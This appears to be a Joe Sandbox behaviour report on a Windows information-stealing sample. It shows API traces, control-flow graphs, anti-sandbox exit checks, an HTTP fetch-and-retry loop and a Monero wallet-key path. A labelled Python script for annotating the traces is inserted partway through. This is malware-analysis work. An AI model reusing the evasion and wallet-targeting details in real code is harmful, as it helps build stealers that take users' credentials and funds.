                                    • GetProcAddress.KERNEL32(6F4E0000,00D254A8), ref: 0009A5A9
                                    • GetProcAddress.KERNEL32(6F4E0000,00D253C8), ref: 0009A5C2
                                    • GetProcAddress.KERNEL32(6F4E0000,00D25428), ref: 0009A5DA
                                    • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 0009A5F1
                                    • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 0009A607
                                    • GetProcAddress.KERNEL32(75AE0000,00D3DCA0), ref: 0009A629
                                    • GetProcAddress.KERNEL32(75AE0000,00D38B78), ref: 0009A641
                                    • GetProcAddress.KERNEL32(75AE0000,00D3DC58), ref: 0009A659
                                    • GetProcAddress.KERNEL32(75AE0000,00D3DD60), ref: 0009A672
                                    • GetProcAddress.KERNEL32(76300000,00D254E8), ref: 0009A693
                                    • GetProcAddress.KERNEL32(6FE40000,00D3DBE0), ref: 0009A6B4
                                    • GetProcAddress.KERNEL32(6FE40000,00D25548), ref: 0009A6CD
                                    • GetProcAddress.KERNEL32(6FE40000,00D3DD48), ref: 0009A6E5
                                    • GetProcAddress.KERNEL32(6FE40000,00D3DCB8), ref: 0009A6FD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                     • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: HttpQueryInfoA$InternetSetOptionA
                                    • API String ID: 2238633743-1775429166
                                    • Opcode ID: 378d0f5d3daa4153ddcbc52ebe7561bca3c46eeb99c70a7992f6ae28b8beecad
                                    • Instruction ID: 78bf24dfea621ae367f77698703bb4e81ba6fc1d1631229e38bf19e7ff023af7
                                    • Opcode Fuzzy Hash: 378d0f5d3daa4153ddcbc52ebe7561bca3c46eeb99c70a7992f6ae28b8beecad
                                    • Instruction Fuzzy Hash: 62627EB5601288AFC344DFA8FD8CD6AB7F9F78C309314861AA609C7234D7399859DF52

                                     Control-flow Graph (basic blocks as node id, address range and calls; "->" lists the successor nodes)
                                     • 1033 86280-8630b: call 9a7a0, call 847b0, call 9a740, InternetOpenA, StrCmpCA -> 1040, 1041
                                     • 1040 8630d -> 1041
                                     • 1041 86314-86318 -> 1042, 1043
                                     • 1042 86509-86525: call 9a7a0, call 9a800 * 2 -> 1062
                                     • 1043 8631e-86342: InternetConnectA -> 1044, 1045
                                     • 1044 86348-8634c -> 1047, 1048
                                     • 1045 864ff-86503: InternetCloseHandle -> 1042
                                     • 1047 8635a -> 1050
                                     • 1048 8634e-86358 -> 1050
                                     • 1050 86364-86392: HttpOpenRequestA -> 1052, 1053
                                     • 1052 86398-8639c -> 1055, 1056
                                     • 1053 864f5-864f9: InternetCloseHandle -> 1045
                                     • 1055 8639e-863bf: InternetSetOptionA -> 1056
                                     • 1056 863c5-86405: HttpSendRequestA, HttpQueryInfoA -> 1058, 1059
                                     • 1058 8642c-8644b: call 98940 -> 1066, 1067
                                     • 1059 86407-86427: call 9a740, call 9a800 * 2 -> 1062
                                     • 1062 86528-8652d (no successors)
                                     • 1066 864c9-864e9: call 9a740, call 9a800 * 2 -> 1062
                                     • 1067 8644d-86454 -> 1069, 1070
                                     • 1069 86456-86480: InternetReadFile -> 1073, 1074
                                     • 1070 864c7-864ef: InternetCloseHandle -> 1053
                                     • 1073 8648b -> 1070
                                     • 1074 86482-86489 -> 1073, 1079
                                     • 1079 8648d-864c5: call 9a9b0, call 9a8a0, call 9a800 -> 1069
                                    APIs
                                      • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                      • Part of subcall function 000847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00084839
                                      • Part of subcall function 000847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00084849
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                    • InternetOpenA.WININET(000A0DFE,00000001,00000000,00000000,00000000), ref: 000862E1
                                    • StrCmpCA.SHLWAPI(?,00D3FCE0), ref: 00086303
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00086335
                                    • HttpOpenRequestA.WININET(00000000,GET,?,00D3F488,00000000,00000000,00400100,00000000), ref: 00086385
                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000863BF
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000863D1
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 000863FD
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0008646D
                                    • InternetCloseHandle.WININET(00000000), ref: 000864EF
                                    • InternetCloseHandle.WININET(00000000), ref: 000864F9
                                    • InternetCloseHandle.WININET(00000000), ref: 00086503
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                    • String ID: ERROR$ERROR$GET
                                    • API String ID: 3749127164-2509457195
                                    • Opcode ID: 5bf8066a46afedb18af19818aae1c0f4498486121970cc8fc671567da87c0eab
                                    • Instruction ID: 41455f1b72bcb1ff831e1698f0a75cfab96611eb94c8e9beec5bf36a60018942
                                    • Opcode Fuzzy Hash: 5bf8066a46afedb18af19818aae1c0f4498486121970cc8fc671567da87c0eab
                                    • Instruction Fuzzy Hash: DA715071A00218ABDF24EFA0DC49FEEB7B4FB45704F108158F10A6B191DBB56A89DF91

                                     Control-flow Graph (basic blocks as node id, address range and calls; "->" lists the successor nodes)
                                     • 1090 95510-95577: call 95ad0, call 9a820 * 3, call 9a740 * 4 -> 1106
                                     • 1106 9557c-95583 -> 1107, 1108
                                     • 1107 95585-955b6: call 9a820, call 9a7a0, call 81590, call 951f0 -> 1124
                                     • 1108 955d7-9564c: call 9a740 * 2, call 81590, call 952c0, call 9a8a0, call 9a800, call 9aad0, StrCmpCA -> 1134, 1138
                                     • 1124 955bb-955d2: call 9a8a0, call 9a800 -> 1134
                                     • 1134 95693-956a9: call 9aad0, StrCmpCA -> 1139, 1140
                                     • 1138 9564e-9568e: call 9a7a0, call 81590, call 951f0, call 9a8a0, call 9a800 -> 1134
                                     • 1139 957dc-95844: call 9a8a0, call 9a820 * 2, call 81670, call 9a800 * 4, call 96560, call 81550 -> 1270
                                     • 1140 956af-956b6 -> 1143, 1144
                                     • 1143 957da-9585f: call 9aad0, StrCmpCA -> 1163, 1164
                                     • 1144 956bc-956c3 -> 1148, 1149
                                     • 1148 9571e-95793: call 9a740 * 2, call 81590, call 952c0, call 9a8a0, call 9a800, call 9aad0, StrCmpCA -> 1143, 1249
                                     • 1149 956c5-95719: call 9a820, call 9a7a0, call 81590, call 951f0, call 9a8a0, call 9a800 -> 1143
                                     • 1163 95991-959f9: call 9a8a0, call 9a820 * 2, call 81670, call 9a800 * 4, call 96560, call 81550 -> 1270
                                     • 1164 95865-9586c -> 1170, 1171
                                     • 1170 9598f-95a14: call 9aad0, StrCmpCA -> 1199, 1200
                                     • 1171 95872-95879 -> 1178, 1179
                                     • 1178 9587b-958ce: call 9a820, call 9a7a0, call 81590, call 951f0, call 9a8a0, call 9a800 -> 1170
                                     • 1179 958d3-95948: call 9a740 * 2, call 81590, call 952c0, call 9a8a0, call 9a800, call 9aad0, StrCmpCA -> 1170, 1275
                                     • 1199 95a28-95a91: call 9a8a0, call 9a820 * 2, call 81670, call 9a800 * 4, call 96560, call 81550 -> 1270
                                     • 1200 95a16-95a21: Sleep -> 1106
                                     • 1249 95795-957d5: call 9a7a0, call 81590, call 951f0, call 9a8a0, call 9a800 -> 1143
                                     • 1270 95ac3-95ac6 (no successors)
                                     • 1275 9594a-9598a: call 9a7a0, call 81590, call 951f0, call 9a8a0, call 9a800 -> 1170
                                    APIs
                                      • Part of subcall function 0009A820: lstrlen.KERNEL32(00084F05,?,?,00084F05,000A0DDE), ref: 0009A82B
                                      • Part of subcall function 0009A820: lstrcpy.KERNEL32(000A0DDE,00000000), ref: 0009A885
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00095644
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000956A1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00095857
                                      • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                      • Part of subcall function 000951F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00095228
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                      • Part of subcall function 000952C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00095318
                                      • Part of subcall function 000952C0: lstrlen.KERNEL32(00000000), ref: 0009532F
                                      • Part of subcall function 000952C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00095364
                                      • Part of subcall function 000952C0: lstrlen.KERNEL32(00000000), ref: 00095383
                                      • Part of subcall function 000952C0: lstrlen.KERNEL32(00000000), ref: 000953AE
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0009578B
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00095940
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00095A0C
                                    • Sleep.KERNEL32(0000EA60), ref: 00095A1B
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen$Sleep
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 507064821-2791005934
                                    • Opcode ID: d0f574beb4bfbdb62db9a6f42d24014fafd495f662af95c57798b1eb2306ad5c
                                    • Instruction ID: 8987cf73115bf4b3ed1d96451ade0b5a555284414a49c76dc9dcdb0194dea2a8
                                    • Opcode Fuzzy Hash: d0f574beb4bfbdb62db9a6f42d24014fafd495f662af95c57798b1eb2306ad5c
                                    • Instruction Fuzzy Hash: 4EE11F71A205089ACF14FBA0EC57EEE737CAF55340F508528B50666493EF346A09EBD2

                                     Control-flow Graph (basic blocks as node id, address range and calls; "->" lists the successor nodes)
                                     • 1301 917a0-917cd: call 9aad0, StrCmpCA -> 1304, 1305
                                     • 1304 917cf-917d1: ExitProcess (no successors)
                                     • 1305 917d7-917f1: call 9aad0 -> 1309
                                     • 1309 917f4-917f8 -> 1310, 1311
                                     • 1310 917fe-91811 -> 1313, 1314
                                     • 1311 919c2-919cd: call 9a800 (no successors)
                                     • 1313 9199e-919bd -> 1309
                                     • 1314 91817-9181a -> 1316, 1317, 1318, 1319, 1320, 1321, 1322, 1323, 1324, 1325, 1326, 1327, 1328
                                     • 1316 91849-91858: call 9a820 -> 1313
                                     • 1317 918ad-918be: StrCmpCA -> 1340, 1341
                                     • 1318 918cf-918e0: StrCmpCA -> 1342, 1343
                                     • 1319 9198f-91999: call 9a820 -> 1313
                                     • 1320 91821-91830: call 9a820 -> 1313
                                     • 1321 9185d-9186e: StrCmpCA -> 1336, 1337
                                     • 1322 9187f-91890: StrCmpCA -> 1338, 1339
                                     • 1323 918f1-91902: StrCmpCA -> 1344, 1345
                                     • 1324 91951-91962: StrCmpCA -> 1350, 1351
                                     • 1325 91970-91981: StrCmpCA -> 1330, 1331
                                     • 1326 91913-91924: StrCmpCA -> 1346, 1347
                                     • 1327 91932-91943: StrCmpCA -> 1348, 1349
                                     • 1328 91835-91844: call 9a820 -> 1313
                                     • 1330 9198d -> 1313
                                     • 1331 91983-91986 -> 1330
                                     • 1336 9187a -> 1313
                                     • 1337 91870-91873 -> 1336
                                     • 1338 9189e-918a1 -> 1355
                                     • 1339 91892-9189c -> 1355
                                     • 1340 918ca -> 1313
                                     • 1341 918c0-918c3 -> 1340
                                     • 1342 918ec -> 1313
                                     • 1343 918e2-918e5 -> 1342
                                     • 1344 9190e -> 1313
                                     • 1345 91904-91907 -> 1344
                                     • 1346 91930 -> 1313
                                     • 1347 91926-91929 -> 1346
                                     • 1348 9194f -> 1313
                                     • 1349 91945-91948 -> 1348
                                     • 1350 9196e -> 1313
                                     • 1351 91964-91967 -> 1350
                                     • 1355 918a8 -> 1313
                                    APIs
                                    • StrCmpCA.SHLWAPI(00000000,block), ref: 000917C5
                                    • ExitProcess.KERNEL32 ref: 000917D1
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: 3e070a2abf84ea5ecb93fc3414b4715184841fefbdddb1fe77a561793a152e79
                                    • Instruction ID: 27c892faaf1643cc8a74cb768586adaefd2b632e487a00e03d200d4337b56488
                                    • Opcode Fuzzy Hash: 3e070a2abf84ea5ecb93fc3414b4715184841fefbdddb1fe77a561793a152e79
                                    • Instruction Fuzzy Hash: B45138B5B0420EEBDF14DFA0DA58AFE77B5BF44704F208048E906AB241D770E951EB62

                                     Control-flow Graph (basic blocks as node id, address range and calls; "->" lists the successor nodes)
                                     • 1356 97500-9754a: GetWindowsDirectoryA -> 1357, 1358
                                     • 1357 9754c -> 1358
                                     • 1358 97553-975c7: GetVolumeInformationA, call 98d00 * 3 -> 1365
                                     • 1365 975d8-975df -> 1366, 1367
                                     • 1366 975fc-97617: GetProcessHeap, RtlAllocateHeap -> 1369, 1370
                                     • 1367 975e1-975fa: call 98d00 -> 1365
                                     • 1369 97619-97626: call 9a740 -> 1377
                                     • 1370 97628-97658: wsprintfA, call 9a740 -> 1377
                                     • 1377 9767e-9768e (no successors)
                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00097542
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0009757F
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00097603
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0009760A
                                    • wsprintfA.USER32 ref: 00097640
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
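Added example (not part of the Joe Sandbox report and not the sample's own code): a Python annotator for the API-trace lines in the functions above. It parses the report's `Api.MODULE(args), ref: addr` format and decodes the WinINet constants with values taken from wininet.h, which turns the 86280 routine into a readable sequence: InternetConnectA with INTERNET_SERVICE_HTTP, a GET opened with INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE (0x00400100), INTERNET_OPTION_SECURITY_FLAGS (0x1F) set from a 4-byte buffer, the status code read via HTTP_QUERY_STATUS_CODE (0x13), and the body pulled with InternetReadFile in 0x7CF-byte reads. The same pass reports the 0xEA60 ms Sleep in the 95510 loop as 60 s, names the literal ("block") compared right before ExitProcess at 917a0, and groups the GetProcAddress calls of the import-resolution function at 9a0xx by module handle, separating the two names the sandbox rendered (InternetSetOptionA, HttpQueryInfoA) from the ones passed only as heap addresses. The sample input is the report's own lines copied in; the value the sample writes to INTERNET_OPTION_SECURITY_FLAGS is shown as "?" in the trace and is not assumed here.

```python
"""Annotate Joe Sandbox API-trace lines ("Api.MODULE(args), ref: addr") and decode the
WinINet constants in them. Added example; not code from the report or from the sample."""
import re
from collections import namedtuple

# Constructed sample: lines copied from the report above (9a5xx, 86280, 95510, 917a0, 97500).
SAMPLE_TRACE = """\
GetProcAddress.KERNEL32(6F4E0000,00D25428), ref: 0009A5DA
GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 0009A5F1
GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 0009A607
InternetOpenA.WININET(000A0DFE,00000001,00000000,00000000,00000000), ref: 000862E1
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00086335
HttpOpenRequestA.WININET(00000000,GET,?,00D3F488,00000000,00000000,00400100,00000000), ref: 00086385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000863BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000863D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 000863FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0008646D
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00095644
Sleep.KERNEL32(0000EA60), ref: 00095A1B
StrCmpCA.SHLWAPI(00000000,block), ref: 000917C5
ExitProcess.KERNEL32 ref: 000917D1
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0009757F
"""

LINE_RE = re.compile(r"^\s*(?:•\s*)?(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$")
HEX8_RE = re.compile(r"^[0-9A-Fa-f]{8}$")
ApiCall = namedtuple("ApiCall", "api module args ref")  # args: int for 8-hex-digit values, None for "?", str otherwise

# Values from wininet.h (Windows SDK); only the entries this trace needs.
SERVICES = {1: "INTERNET_SERVICE_FTP", 3: "INTERNET_SERVICE_HTTP"}
REQUEST_FLAGS = {0x80000000: "INTERNET_FLAG_RELOAD", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
                 0x00800000: "INTERNET_FLAG_SECURE", 0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
                 0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT", 0x00080000: "INTERNET_FLAG_NO_COOKIES",
                 0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID", 0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
                 0x00000200: "INTERNET_FLAG_NO_UI", 0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE"}
OPTIONS = {2: "INTERNET_OPTION_CONNECT_TIMEOUT", 31: "INTERNET_OPTION_SECURITY_FLAGS", 41: "INTERNET_OPTION_USER_AGENT"}
QUERY_INFO = {5: "HTTP_QUERY_CONTENT_LENGTH", 19: "HTTP_QUERY_STATUS_CODE", 22: "HTTP_QUERY_RAW_HEADERS_CRLF"}


def parse_arg(tok):
    tok = tok.strip()
    return None if tok == "?" else (int(tok, 16) if HEX8_RE.match(tok) else tok)


def parse_trace(text):
    """ApiCall tuples for every line in the report's format; other lines are skipped."""
    calls = []
    for m in filter(None, map(LINE_RE.match, text.splitlines())):
        api, module, raw, ref = m.groups()
        calls.append(ApiCall(api, module, [parse_arg(a) for a in raw.split(",")] if raw else [], int(ref, 16)))
    return calls


def decode_flags(value, table):
    """Bit mask -> symbolic names; bits not in the table stay as a hex remainder."""
    names = [n for bit, n in table.items() if value & bit]
    rest = value & ~sum(bit for bit in table if value & bit)
    return names + ([f"0x{rest:08X}"] if rest else [])


def annotate(call):
    """Explain the constant arguments of one call; positions follow the SDK signatures."""
    a, api = call.args, call.api
    if api == "InternetConnectA":    # dwService is the 6th argument
        return [SERVICES.get(a[5], f"service {a[5]}")]
    if api == "HttpOpenRequestA":    # lpszVerb 2nd, dwFlags 7th
        return [f"verb={a[1]}"] + decode_flags(a[6], REQUEST_FLAGS)
    if api == "InternetSetOptionA":  # dwOption 2nd, dwBufferLength 4th
        return [OPTIONS.get(a[1], f"option {a[1]}"), f"bufferLength={a[3]}"]
    if api == "HttpQueryInfoA":      # dwInfoLevel 2nd; the report prints *lpdwBufferLength as the 4th value
        return [QUERY_INFO.get(a[1], f"info level {a[1]}"), f"bufferLength={a[3]}"]
    if api == "InternetReadFile":    # dwNumberOfBytesToRead 3rd
        return [f"readChunk={a[2]} bytes"]
    if api == "Sleep":
        return [f"{a[0] / 1000:g} s"]
    if api == "StrCmpCA":
        lits = [x for x in a if isinstance(x, str)]
        return [f"compares against {lits[0]!r}"] if lits else []
    return []


def import_resolution(calls):
    """GetProcAddress targets per module handle: the rendered name, or the heap address of a name the sandbox could not render."""
    by_module = {}
    for c in calls:
        if c.api == "GetProcAddress":
            name = c.args[1] if isinstance(c.args[1], str) else f"name@0x{c.args[1]:08X}"
            by_module.setdefault(c.args[0], []).append(name)
    return by_module


def summarize(calls):
    """WinINet call order, Sleep intervals, the literal compared right before ExitProcess, volume-info use."""
    exit_guard = None
    for prev, cur in zip(calls, calls[1:]):
        if cur.api == "ExitProcess" and prev.api == "StrCmpCA":
            exit_guard = next((x for x in prev.args if isinstance(x, str)), None)
    return {"wininet_order": [c.api for c in calls if c.module == "WININET"],
            "sleep_intervals_s": [c.args[0] / 1000 for c in calls if c.api == "Sleep"],
            "exit_after_compare_with": exit_guard,
            "reads_volume_info": any(c.api == "GetVolumeInformationA" for c in calls)}


if __name__ == "__main__":
    for c in parse_trace(SAMPLE_TRACE):
        print(f"{c.ref:08X} {c.api:<22} {', '.join(annotate(c))}")
```

Run it as a script to print one annotated line per call; a whole report export can be piped through parse_trace unchanged, and the constant tables are the only part that needs extending for APIs outside this trace.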
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                    • String ID: :$C$\$
                                    • API String ID: 1544550907-1928815233
                                    • Opcode ID: ece935215d299190ef4fd90a763c50f98e59e3dc584f9b7820da9551b5346b98
                                    • Instruction ID: 56a6533f98e7cee51110eb0b6ccc1866a195ce31a0948bf01b9de5b316ca4e85
                                    • Opcode Fuzzy Hash: ece935215d299190ef4fd90a763c50f98e59e3dc584f9b7820da9551b5346b98
                                    • Instruction Fuzzy Hash: 144191B1D04248ABDF10DF94DC49FEEBBB8EF08704F104199F509A7281DB74AA44DBA5

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00099860: GetProcAddress.KERNEL32(76210000,00D31668), ref: 000998A1
                                      • Part of subcall function 00099860: GetProcAddress.KERNEL32(76210000,00D317B8), ref: 000998BA
                                      • Part of subcall function 00099860: GetProcAddress.KERNEL32(76210000,00D31608), ref: 000998D2
                                      • Part of subcall function 00099860: GetProcAddress.KERNEL32(76210000,00D315C0), ref: 000998EA
                                      • Part of subcall function 00099860: GetProcAddress.KERNEL32(76210000,00D315F0), ref: 00099903
                                      • Part of subcall function 00099860: GetProcAddress.KERNEL32(76210000,00D38AD8), ref: 0009991B
                                      • Part of subcall function 00099860: GetProcAddress.KERNEL32(76210000,00D25128), ref: 00099933
                                      • Part of subcall function 00099860: GetProcAddress.KERNEL32(76210000,00D24F88), ref: 0009994C
                                      • Part of subcall function 00099860: GetProcAddress.KERNEL32(76210000,00D31518), ref: 00099964
                                      • Part of subcall function 00099860: GetProcAddress.KERNEL32(76210000,00D31638), ref: 0009997C
                                      • Part of subcall function 00099860: GetProcAddress.KERNEL32(76210000,00D31530), ref: 00099995
                                      • Part of subcall function 00099860: GetProcAddress.KERNEL32(76210000,00D31650), ref: 000999AD
                                      • Part of subcall function 00099860: GetProcAddress.KERNEL32(76210000,00D25048), ref: 000999C5
                                      • Part of subcall function 00099860: GetProcAddress.KERNEL32(76210000,00D316C8), ref: 000999DE
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 000811D0: ExitProcess.KERNEL32 ref: 00081211
                                      • Part of subcall function 00081160: GetSystemInfo.KERNEL32(?), ref: 0008116A
                                      • Part of subcall function 00081160: ExitProcess.KERNEL32 ref: 0008117E
                                      • Part of subcall function 00081110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0008112B
                                      • Part of subcall function 00081110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00081132
                                      • Part of subcall function 00081110: ExitProcess.KERNEL32 ref: 00081143
                                      • Part of subcall function 00081220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0008123E
                                      • Part of subcall function 00081220: __aulldiv.LIBCMT ref: 00081258
                                      • Part of subcall function 00081220: __aulldiv.LIBCMT ref: 00081266
                                      • Part of subcall function 00081220: ExitProcess.KERNEL32 ref: 00081294
                                      • Part of subcall function 00096770: GetUserDefaultLangID.KERNEL32 ref: 00096774
                                      • Part of subcall function 00081190: ExitProcess.KERNEL32 ref: 000811C6
                                      • Part of subcall function 00097850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000811B7), ref: 00097880
                                      • Part of subcall function 00097850: RtlAllocateHeap.NTDLL(00000000), ref: 00097887
                                      • Part of subcall function 00097850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0009789F
                                      • Part of subcall function 000978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00097910
                                      • Part of subcall function 000978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00097917
                                      • Part of subcall function 000978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0009792F
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00D38C68,?,000A110C,?,00000000,?,000A1110,?,00000000,000A0AEF), ref: 00096ACA
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00096AE8
                                    • CloseHandle.KERNEL32(00000000), ref: 00096AF9
                                    • Sleep.KERNEL32(00001770), ref: 00096B04
                                    • CloseHandle.KERNEL32(?,00000000,?,00D38C68,?,000A110C,?,00000000,?,000A1110,?,00000000,000A0AEF), ref: 00096B1A
                                    • ExitProcess.KERNEL32 ref: 00096B22
                                    Similarity
                                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                    • String ID:
                                    • API String ID: 2525456742-0
                                    • Opcode ID: f7a1100e60edbb3da0bbb16542ef5e8a3e8e29d1342a7ad7be186a933c03bb94
                                    • Instruction ID: 2b41a55a420a45435638e155a4bd9aa06a691f7c077b3d5e65278f6cb2bf867a
                                    • Opcode Fuzzy Hash: f7a1100e60edbb3da0bbb16542ef5e8a3e8e29d1342a7ad7be186a933c03bb94
                                    • Instruction Fuzzy Hash: 8D31EA71A50208AADF04FBF0EC5ABEEB778BF15740F104518F212A6193DF716905EBA6

                                    Control-flow Graph (basic blocks and edges recovered from the rendered graph)
                                    • 1436: 81220-81247 call 989b0, GlobalMemoryStatusEx -> 1439, 1440
                                    • 1439: 81249-81271 call 9da00 * 2 -> 1442
                                    • 1440: 81273-8127a -> 1442
                                    • 1442: 81281-81285 -> 1444, 1445
                                    • 1444: 8129a-8129d
                                    • 1445: 81287 -> 1447, 1448
                                    • 1447: 81289-81290 -> 1444, 1448
                                    • 1448: 81292-81294 ExitProcess
                                    APIs
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0008123E
                                    • __aulldiv.LIBCMT ref: 00081258
                                    • __aulldiv.LIBCMT ref: 00081266
                                    • ExitProcess.KERNEL32 ref: 00081294
                                    Strings
                                    Similarity
                                    • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                    • String ID: @
                                    • API String ID: 3404098578-2766056989
                                    • Opcode ID: 9ab9ef9c1be22f0fd1fb0bbbac7ca8c9d991c6bff6abec0a1bba09b396130bd4
                                    • Instruction ID: e003f515d5a38b9f1972656083cfc934a261137a834f630560b5ed00df5f5e9b
                                    • Opcode Fuzzy Hash: 9ab9ef9c1be22f0fd1fb0bbbac7ca8c9d991c6bff6abec0a1bba09b396130bd4
                                    • Instruction Fuzzy Hash: BB014BB0940308AAEF10EBE0DC4AFDEBBB8BF04705F208049E605B62C1D67455568799

                                    Control-flow Graph (basic blocks and edges recovered from the rendered graph)
                                    • 1450: 96af3 -> 1451
                                    • 1451: 96b0a -> 1453, 1454
                                    • 1453: 96aba-96ad7 call 9aad0, OpenEventA -> 1460, 1461
                                    • 1454: 96b0c-96b22 call 96920, call 95b10, CloseHandle, ExitProcess
                                    • 1460: 96ad9-96af1 call 9aad0, CreateEventA -> 1454
                                    • 1461: 96af5-96b04 CloseHandle, Sleep -> 1451
